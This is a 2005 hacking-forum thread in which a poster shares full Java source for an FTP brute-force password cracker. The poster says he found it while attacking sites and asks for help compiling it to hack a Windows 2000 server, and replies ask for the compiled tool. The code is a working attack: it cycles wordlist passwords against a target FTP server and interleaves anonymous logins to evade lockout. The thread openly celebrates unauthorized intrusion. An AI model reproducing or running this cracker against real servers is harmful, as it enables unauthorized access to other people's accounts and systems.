Waraxe IT Security Portal
Login or Register
January 16, 2026
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 61
Members: 0
Total: 61
Full disclosure
[REVIVE-SA-2026-001] Revive Adserver Vulnerabilities
Defense in depth -- the Microsoft way (part 95): the (shared)"Start Menu" is dispensable
Re: Multiple Security Misconfigurations and CustomerEnumeration Exposure in Convercent Whistleblowing Platform(EQS Group)
RIOT OS 2026.01-devel-317 Stack-Based Buffer Overflow in RIOT ethos Serial Frame Parser
RIOT OS 2026.01-devel-317 Stack-Based Buffer Overflow in tapslip6 Utility via Unbounded Device Path Construction
TinyOS 2.1.2 Stack-Based Buffer Overflow in mcp2200gpio
TinyOS 2.1.2 printfUART Global Buffer Overflow via UnboundedFormat Expansion
KL-001-2026-01: yintibao Fun Print Mobile Unauthorized Access via Context Hijacking
Multiple Security Misconfigurations and Customer Enumeration Exposure in Convercent Whistleblowing Platform (EQS Group)
Panda3d v1.10.16 Uncontrolled Format String in Panda3D egg-mkfont Allows Stack Memory Disclosure
Panda3d v1.10.16 egg-mkfont Stack Buffer Overflow
Panda3d v1.10.16 deploy-stub Unbounded Stack Allocation Leading to Uninitialized Memory
MongoDB v8.3.0 Integer Underflow in LMDB mdb_load
Bioformats v8.3.0 Untrusted Deserialization of Bio-Formats Memoizer Cache Files
Bioformats v8.3.0 Improper Restriction of XML External Entity Reference in Bio-Formats Leica Microsystems XML Parser
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Attck win2000 Server By this Code
Post new topicReply to topic View previous topic :: View next topic
Attck win2000 Server By this Code
PostPosted: Sat Mar 26, 2005 9:08 am Reply with quote
oxo
Beginner
Beginner
Joined: Mar 26, 2005
Posts: 1




GOOD HACKING AND COOL DISTORY FOR EVERY CACKER AND CRACKER HERE...
well < let me explain what i found yesterday when i was trying to attack some sites
after complete scan i get this expilote that written with code jave :
--------------------------------------------------------------------------------------

import java.io.*;
import java.net.*;
import java.util.*;
public class newftpbrute
{
static boolean cancel=false;
static boolean found=false;

static String File;
static String User;
static String line="";
static String FTPPass;
static String Server="";

static int Counter;
static int tries;

static BufferedReader quelle;
static DataInputStream sin;
static PrintStream sout;
static Socket s = null;



void getdata()
{
try
{
System.out.print("FTP-Server>");
DataInputStream in = new DataInputStream (System.in);
Server=in.readLine();

System.out.print("Username>");
in = new DataInputStream (System.in);
User=in.readLine();

System.out.print("Wordlist>");
in = new DataInputStream (System.in);
File=in.readLine();
System.out.print("\n");
try
{
quelle=new BufferedReader(new FileReader(File));
}
catch (FileNotFoundException FNF){};
}
catch (IOException e){}
}//getdata()





void connect()
{
try
{
s = new Socket(Server, 21);
sin = new DataInputStream (s.getInputStream());
sout = new PrintStream (s.getOutputStream());
}
catch (IOException e){}
}



void CheckForAnonymous()
{
try
{
boolean NoAno=false;

sout.println("USER anonymous");

if ((line=sin.readLine()).indexOf("331")==-1)
NoAno=true;

while (true)
{
if (line.indexOf("220")>-1)line=sin.readLine();
else break;
}


sout.println("pass evil_hacker@j00r_server.com");

if ((line=sin.readLine()).indexOf("230 ")>-1)
{
System.out.println("Anonymous access allowed...");
NoAno=false;
}

else
NoAno=true;

if (NoAno)
{
System.out.println("Anonymous Access not allowed...quitting!");
System.exit(0);
}

}//try
catch (IOException e)
{
System.out.println("Error Connecting:"+e+" quitting...");
System.exit(0);
}


}//CheckForAnonymous




public static void main(String[] args)
{
System.out.println("NEW type of FTP brute force\nCoded by Craig from [ H a Q u a r t e r ]\nHTTP://www.HaQuarter.De\n");

newftpbrute now=new newftpbrute();
now.getdata();
now.connect();

try
{

if ((line=sin.readLine()).indexOf("220")==-1)
{
System.out.println("Error...ftp server sends unexpected input");
cancel=true;
}


now.CheckForAnonymous();

while (cancel==false && ((FTPPass=quelle.readLine())!=null))
{
Counter++;
tries++;

System.out.println("#"+tries+" "+FTPPass);
sout.println("USER "+User);

if ((line=sin.readLine()).indexOf("331 ")==-1)
{
System.out.println("Error: username not accepted...quitting ");
System.exit(0);
}

sout.println("PASS "+FTPPass);

if ((line=sin.readLine()).indexOf("230 ")>-1)
{
found=true;
break;
}


if (Counter%2==0)
{
System.out.println("-");
sout.println("user anonymous");
line=sin.readLine();

sout.println("pass evil_hacker@j00r_server.com");
line=sin.readLine();

Counter=0;
}

}//while


if (found==true)
System.out.println("\nAccount was cracked after "+tries+" tries. Password for user "+User+" is \""+FTPPass+"\"\n");

}//try
catch (IOException e){}



}//main






}//class

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
SO I"m not perfisonal to Compiler this code with java and I hope to find some help here to compiler it and I"ll put his singht on the site as soon as hacking it... and thank you for you sharing here.


ILOVE THIS SITE
View user's profile Send private message
PostPosted: Sat Mar 26, 2005 12:13 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Hey thats just what I needed.
Could you give us the link to the compiled version once you compile it? Compiling isnt my piece of cake. MMMMM cake........

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Tue Mar 29, 2005 7:47 am Reply with quote
xtremeshell
Regular user
Regular user
Joined: Mar 21, 2005
Posts: 6
Location: Somewhere In Hell !!




Yeah..!! We would like to see Smile ThX for The Code dude..
View user's profile Send private message
PostPosted: Tue Mar 29, 2005 8:40 am Reply with quote
safer
Regular user
Regular user
Joined: Jun 20, 2004
Posts: 5




Could you give us the link to the compiled version once you compile it and the full code?

54safer@gmail.com

thanks
View user's profile Send private message
Attck win2000 Server By this Code
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.043 Seconds